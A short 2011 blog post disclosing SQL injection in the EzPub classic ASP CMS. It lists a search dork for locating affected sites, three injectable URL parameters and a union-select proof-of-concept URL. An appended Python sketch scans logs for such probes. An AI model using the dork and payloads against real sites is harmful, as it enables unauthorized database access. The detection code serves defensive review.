Tuesday, March 8, 2011

EzPub - Simple Classic ASP CMS Vulnerable to SQL Injection


Title : EzPub - Simple Classic ASP CMS Vulnerable to SQL Injection
Web : http://www.soft4web.ro
Found by: p0pc0rn 08/03/2011
Dork : intext:"Powered by EZPub"


SQL - Microsoft JET Database Engine error
------------------------------------------

http://site.com/view_article.asp?item=[SQL]
http://site.com/page.asp?pID=[SQL]
http://site.com/display.asp?sortby=sections&sID=[SQL]

POC
---

http://site.com/view_article.asp?item=1 union select 1 from test.a


thanks,
-p0pc0rn-
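For sites running this CMS, the sketch below flags requests to the three pages listed above whose ID parameter is not a plain integer. It is an added example, not part of the original advisory or the EzPub code base; the simplified five-field log layout, the sample lines and the assumption that `item`, `pID` and `sID` are integer IDs are all constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Pages and parameters named in the advisory, lowercased because
# classic ASP treats paths and query-string keys case-insensitively.
WATCHED = {
    "/view_article.asp": ("item",),
    "/page.asp": ("pid",),
    "/display.asp": ("sid",),
}
INT_RE = re.compile(r"[0-9]{1,10}")  # assumption: IDs are small non-negative integers

# Constructed sample lines: "client-ip method uri-stem uri-query status".
SAMPLE_LOG = """\
203.0.113.5 GET /view_article.asp item=12 200
203.0.113.9 GET /view_article.asp item=1+union+select+1+from+test.a 500
203.0.113.9 GET /page.asp pID=3%27 500
203.0.113.7 GET /display.asp sortby=sections&sID=4 200
203.0.113.7 GET /Display.asp sortby=sections 200
203.0.113.8 GET /default.asp - 200
"""

def suspicious_params(stem, query):
    """Return [(param, decoded_value)] for watched params that are not plain integers."""
    params = WATCHED.get(stem.lower())
    if params is None or query == "-":
        return []
    parsed = {}  # parse_qs URL-decodes values; keep blanks so "item=" is still checked
    for key, values in parse_qs(query, keep_blank_values=True).items():
        parsed.setdefault(key.lower(), []).extend(values)
    return [(n, v) for n in params for v in parsed.get(n, []) if not INT_RE.fullmatch(v)]

def scan(log_text):
    """Scan log text and return one finding per suspicious parameter value."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        fields = line.split()
        if len(fields) != 5:
            continue  # skip comments and malformed lines
        ip, _method, stem, query, status = fields
        for name, value in suspicious_params(stem, query):
            findings.append({"line": line_no, "ip": ip, "page": stem,
                             "param": name, "value": value, "status": status})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule belongs in the ASP pages themselves as input validation ahead of a parameterized query; log review only shows where it is already being probed.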